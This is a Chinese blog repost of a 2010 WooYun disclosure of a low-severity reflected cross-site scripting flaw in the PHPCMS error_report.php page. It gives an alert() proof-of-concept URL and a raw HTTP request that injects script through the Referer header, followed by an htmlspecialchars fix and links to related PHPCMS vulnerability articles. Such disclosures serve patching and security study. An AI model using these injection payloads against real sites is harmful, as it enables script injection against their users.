PHPCMS全系列某页面跨站脚本漏洞

最新推荐文章于 2024-05-15 05:08:03 发布
最新推荐文章于 2024-05-15 05:08:03 发布
阅读量3.5k 收藏 2
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124188603
版权

漏洞详情

披露状态:

2010-07-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-07-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

PHPCMS全系列某页面跨站脚本漏洞

详细说明:

PHPCMS全系列错误报告页面跨站脚本漏洞。
两种版本
1、官方demo页面为url xss.
2、官方主站的错误报告页面,$info['error_link']去自referer,更改referer即可插入任意代码。
危害不大,漏洞等级,低。

漏洞证明:

POC1:http://demo.phpcms.cn/error_report/error_report.php?title=1&contentid=1"><script>alert(/xss/)</script><"
POC2:

GET /error_report/error_report.php?title=1 HTTP/1.1
Host: www.phpcms.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=4ko75j2uund85mqgerk0fpup67
Referer: "><script>alert(/xss/)</script><"

修复方案:

error_report.php

$info['error_link'] = htmlspecialchars($info['error_link']);

版权声明:转载请注明来源 CnCxzSec(衰仔)@乌云

Sword-heart
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcms漏洞_phpcms v9.6.0前台任意文件上传漏洞分析
weixin_39809793的博客
11-21 787
前言上一节我们分析了phpcms的后台get shell, 但是众所周知, 开发者对后台的漏洞 是不太上心的。因为管理员账号一般只有网站所有者才会有,如果入侵者能获取到管理员 账号,那么基本上意味着网站的所有信息都为他打开了大门,后台漏洞也就不那么重要了。 那么今天要分析的是phpccms 9.6.0版本的前台get shell. 漏洞的利用方式极其简单。 但是相对而言,代码的漏洞实现逻辑就没有前...
phpcms V9 全站文章点击排行榜标签
09-29
我们在做内容站的时候,经常需要使用到文章排行榜,但phpcms默认的pc调用标签是需要具体栏目ID的,那么如何调用全站文章的点击排行榜呢
phpcms api.php,phpcms注入漏洞【/api/phpsso.php
weixin_42131728的博客
03-10 268
漏洞名称:phpcms注入漏洞补丁文件:/api/phpsso.php漏洞描述:phpcms注入漏洞。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了改漏洞,云盾依然报告存在漏洞,遇到该情况可选择忽略该漏洞提示】源代码:/*** 同步登陆*/if ($action ...
最全PHPcms V9 任意文件上传漏洞_phpcmsv9漏洞(3),2024年最新闭关60天学懂NDK+物联网嵌入式
最新发布
2401_85015332的博客
05-15 398
漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。
PHP跨站脚本攻击(XSS)防范方案
m0_66326520的博客
04-09 1171
反射型XSS攻击是将注入的恶意脚本添加到一个网址中,然后给用户发送这个网址。一旦用户打开这个网址,就会执行脚本并导致攻击。攻击负载和脚本跟随用户点击链接,并被嵌入到响应中,在浏览器上执行。存储型 XSS 攻击指的是攻击者将恶意脚本提交到受害网站的数据库中,当其他用户浏览包含该恶意脚本链接的页面时,就会执行该脚本,从而导致攻击者的目的得以实现。由于是将恶意脚本保存在数据库中,所有访问包含恶意代码的页面的用户都受到攻击。而且这种攻击方式难解决。
url存在宽字节跨站漏洞_PHPCMS漏洞之v9宽字节注入问题
weixin_39568706的博客
12-11 354
关于阿里云提示“phpcmsv9宽字节注入问题”的漏洞修复方案简介:漏洞名称:phpcmsv9宽字节注入问题漏洞描述:phpcmsv9.5.9以后版本开始默认使用mysqli支持,在phpcms/modules/pay/respond.php中,因为代码逻辑不够严谨,导致宽字节注入。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采取了底层/...
Cross-Site Scripting(XSS): 跨站脚本攻击介绍
weixin_33708432的博客
12-21 388
一、XSS攻击简介          作为一种HTML注入攻击,XSS攻击的核心思想就是在HTML页面中注入恶意代码,而XSS采用的注入方式是非常巧妙的。         在XSS攻击中,一般有三个角色参与:攻击者、目标服务器、受害者的浏览器。         由于有的服务器并没有对用户的输入进行安全方面的验证,攻击者就可以很容易地通过正常的输入手段,夹带进一些恶意的HTML脚本代码...
Phpcms V9 调用全站文章排行的解决方法
09-29
今天忙于修改网站界面,想在首页添加浏览排行功能,却发现Phpcms竟然不支持调用全站文章排行。下午仔细研究了Phpcms源码,终于找到解决办法
phpcms v9安全检测api漏洞修改方法
09-29
360提示Phpcms v9存在API漏洞,通常是因为API接口没有正确处理用户输入,可能导致跨站脚本攻击或数据泄露。跨站脚本攻击允许攻击者通过注入恶意脚本到网页,从而控制或窃取用户的浏览器会话。在这种情况下,360的...
PhpCms模块管理教程:全站搜索
09-29
**PhpCms模块管理教程:全站搜索** PhpCms是一款流行的开源内容管理系统,它提供了丰富的功能,包括模块管理和全站搜索。全站搜索是网站的重要功能之一,它允许用户快速查找并定位所需内容。本教程将详细介绍如何在...
phpcmsV9.6.3升级补丁漏洞修复代码功能二次开发补丁phpcms网站开发教程文档手册
03-18
本压缩包包括多年积累的phpcms网站开发升级补丁,漏洞修复补丁。 其中包括教程文档: 后台安装过程中报错 弹出新窗口而不是新选项卡 浏览器不支持缩略图flash上传改H5 表单发送的邮件不显示表单内容 升级后台编辑器-...
php过滤XSS攻击的函数
10-26
PHP站点如何防御XSS攻击呢?看下面的过滤XSS攻击的PHP函数吧,很实用
phpcms attachment.class.php,PHPCMS漏洞分析合集
weixin_42608318的博客
03-22 548
本篇详细分析了 PHPCMS 的部分历史漏洞。其中多是以获取到漏洞点为场景,反向挖掘至漏洞触发入口(假设自己发现了漏洞点,模拟如何找寻整个攻击链及其入口点),旨在提高自身代码审计能力。当中包含一些网络上未公开的触发点,以及补丁对比分析与绕过。v9.6.0任意文件上传这个漏洞存在于用户注册处。这里有一个可控变量 $_POST[‘info’] 传入了 member_input 类的 get 方法中,跟...
phpcms漏洞总结
zhangge3663的博客
10-14 1255
总结表格,呈现如下: 序号 漏洞名称 补丁文件路径 补丁方案 1 phpcms某处逻辑问题导致getshell www/phpcms/libs/classes/attachment.class.php 查看详情 > 2 phpcms authkey生成算法问题导致authkey泄露 www/caches/configs/system.php 查看详情 > 3 phpcms前台注入导致任意文件读取漏洞 www/phpc
PHPcms利用xss执行sql注入
weixin_34149796的博客
09-17 277
来自:http://superman.php100.com/昨天看见phpcmsv9.1.15爆的xss和无权限的sql注入,于是就想测试下利用xss执行sql注入,虽然爆的这个phpcms漏洞还有很多其他的用法!但是,这个注入我没有找到phpcmsv9.1.15测试,其他版本都没有测试成功!于是乎我只有假想下一个极端环境:1.前台有且只有一个xss漏洞(不能获取管理员c...
phpcms上传漏洞
m0_70349048的博客
03-11 744
pspcms上传漏洞
phpcms安全漏洞合集
linhui03的博客
02-14 3336
1、宽字节注入漏洞 /phpcms/modules/pay/respond.php位置约16行 原来代码 $payment = $this->get_by_code($_GET['code']); 替换为 $payment = $this->get_by_code(mysql_real_escape_string($_GET['code'])); 2、phpcms注...
PHPCMSv9.6.0前端任意文件上传漏洞分析
红队是青春
01-29 834
PHPCMSv9.6.0前端任意文件上传漏洞代码分析
PHPCMS整站代码深度解析
"PHPCMS整站代码分析讲解" 在深入探讨PHPCMS整站代码之前,我们首先要了解PHPCMS是什么。PHPCMS是一款基于PHP语言和MySQL数据库开发的开源内容管理系统,它提供了网站建设和管理的一系列功能,包括文章、图片、下载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值